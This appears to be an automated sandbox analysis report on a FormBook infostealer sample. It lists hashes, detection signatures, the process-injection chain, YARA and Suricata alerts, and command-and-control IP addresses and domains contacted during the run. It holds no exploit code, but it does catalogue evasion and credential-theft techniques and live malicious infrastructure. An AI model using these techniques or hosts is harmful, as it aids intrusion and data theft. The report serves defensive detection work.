

Windows Analysis Report
gH3LlhcRzg.exe

Overview

General Information

Sample name: gH3LlhcRzg.exe
(renamed because the original name is a hash value)
Original sample name: 950beb7d3de2bad234415e45b789304bd6ac6e50e6435a78f85e188f03044ae9.exe
Analysis ID: 1588237
MD5: a238864f937038d6fe39092719a1eff0
SHA1: 64dee05a230179d9b8baf50fba1722efecc84a67
SHA256: 950beb7d3de2bad234415e45b789304bd6ac6e50e6435a78f85e188f03044ae9
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • gH3LlhcRzg.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\gH3LlhcRzg.exe" MD5: A238864F937038D6FE39092719A1EFF0)
    • svchost.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\gH3LlhcRzg.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YLmLMhEKNXTfg.exe (PID: 3316 cmdline: "C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 7940 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • YLmLMhEKNXTfg.exe (PID: 5636 cmdline: "C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8152 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\gH3LlhcRzg.exe", CommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", ParentImage: C:\Users\user\Desktop\gH3LlhcRzg.exe, ParentProcessId: 7520, ParentProcessName: gH3LlhcRzg.exe, ProcessCommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", ProcessId: 7584, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\gH3LlhcRzg.exe", CommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", ParentImage: C:\Users\user\Desktop\gH3LlhcRzg.exe, ParentProcessId: 7520, ParentProcessName: gH3LlhcRzg.exe, ProcessCommandLine: "C:\Users\user\Desktop\gH3LlhcRzg.exe", ProcessId: 7584, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T23:05:40.618251+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49974 | 188.114.97.3 | 80 | TCP
2025-01-10T23:06:04.680350+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49979 | 208.91.197.27 | 80 | TCP
2025-01-10T23:06:17.983468+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49983 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:45.893450+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49987 | 104.21.96.1 | 80 | TCP
2025-01-10T23:07:07.337601+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49991 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:20.696839+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49995 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:33.879744+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49999 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:48.025418+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50003 | 160.25.166.123 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T23:05:40.618251+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49974 | 188.114.97.3 | 80 | TCP
2025-01-10T23:06:04.680350+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49979 | 208.91.197.27 | 80 | TCP
2025-01-10T23:06:17.983468+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49983 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:45.893450+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49987 | 104.21.96.1 | 80 | TCP
2025-01-10T23:07:07.337601+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49991 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:20.696839+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49995 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:33.879744+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49999 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:48.025418+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 50003 | 160.25.166.123 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T23:05:56.553179+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49976 | 208.91.197.27 | 80 | TCP
2025-01-10T23:05:59.180842+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49977 | 208.91.197.27 | 80 | TCP
2025-01-10T23:06:01.820857+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49978 | 208.91.197.27 | 80 | TCP
2025-01-10T23:06:10.323108+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49980 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:12.867599+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49981 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:15.416830+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49982 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:38.221913+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49984 | 104.21.96.1 | 80 | TCP
2025-01-10T23:06:40.733955+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49985 | 104.21.96.1 | 80 | TCP
2025-01-10T23:06:43.329442+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49986 | 104.21.96.1 | 80 | TCP
2025-01-10T23:06:59.672017+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49988 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:02.216873+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49989 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:04.806807+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49990 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:13.062340+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49992 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:15.602706+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49993 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:18.142286+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49994 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:26.218382+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49996 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:28.758948+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49997 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:31.325757+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49998 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:40.376353+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 50000 | 160.25.166.123 | 80 | TCP
2025-01-10T23:07:42.946312+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 50001 | 160.25.166.123 | 80 | TCP
2025-01-10T23:07:45.439322+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 50002 | 160.25.166.123 | 80 | TCP
2025-01-10T23:07:53.661162+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 50004 | 68.66.226.119 | 80 | TCP
2025-01-10T23:07:56.232725+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 50005 | 68.66.226.119 | 80 | TCP
2025-01-10T23:07:59.240228+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 50006 | 68.66.226.119 | 80 | TCP



AV Detection

Source: gH3LlhcRzg.exe | Virustotal: Detection: 36%
Source: gH3LlhcRzg.exe | ReversingLabs: Detection: 91%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: gH3LlhcRzg.exe | Joe Sandbox ML: detected
Source: gH3LlhcRzg.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: route.pdb source: svchost.exe, 00000002.00000003.1678399965.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711485129.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000003.1648733208.000000000127B000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000002.3226874358.0000000001267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YLmLMhEKNXTfg.exe, 00000006.00000000.1626737870.00000000007AE000.00000002.00000001.01000000.00000005.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778157226.00000000007AE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: gH3LlhcRzg.exe, 00000000.00000003.1385199866.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1605864959.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608594134.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.0000000003400000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1711628069.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.00000000031E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1713625113.0000000003038000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.000000000337E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: gH3LlhcRzg.exe, 00000000.00000003.1385199866.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1711593848.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1605864959.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608594134.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.0000000003400000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000007.00000003.1711628069.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.00000000031E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1713625113.0000000003038000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.000000000337E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000007.00000002.3229283746.000000000380C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2009532526.000000002794C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: route.pdbGCTL source: svchost.exe, 00000002.00000003.1678399965.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711485129.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000003.1648733208.000000000127B000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000002.3226874358.0000000001267000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000007.00000002.3229283746.000000000380C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2009532526.000000002794C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00D3445A
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3C6D1 FindFirstFileW,FindClose,0_2_00D3C6D1
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00D3C75C
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D3EF95
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D3F0F2
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00D3F3F3
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D337EF
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D33B12
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00D3BCBC
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 7_2_0073C2C0 FindFirstFileW,FindNextFileW,FindClose,7_2_0073C2C0
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 4x nop then xor eax, eax | 7_2_00729EB0
Source: C:\Windows\SysWOW64\ROUTE.EXE | Code function: 4x nop then mov ebx, 00000004h | 7_2_02F804CE

Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49984 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49981 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49978 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:50003 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49983 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:50003 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49983 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49992 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49976 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50006 -> 68.66.226.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49994 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49974 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49974 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50005 -> 68.66.226.119:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49995 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49982 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50002 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49995 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49993 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49990 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49989 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49979 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49979 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49977 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49996 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49991 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49991 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49985 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50000 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49980 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49987 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49987 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49986 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49997 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50004 -> 68.66.226.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50001 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49988 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49998 -> 13.248.169.48:80
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.366800008.xyz
                Source: DNS query: www.031233226.xyz
                Source: DNS query: www.pitaloka.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00D422EE
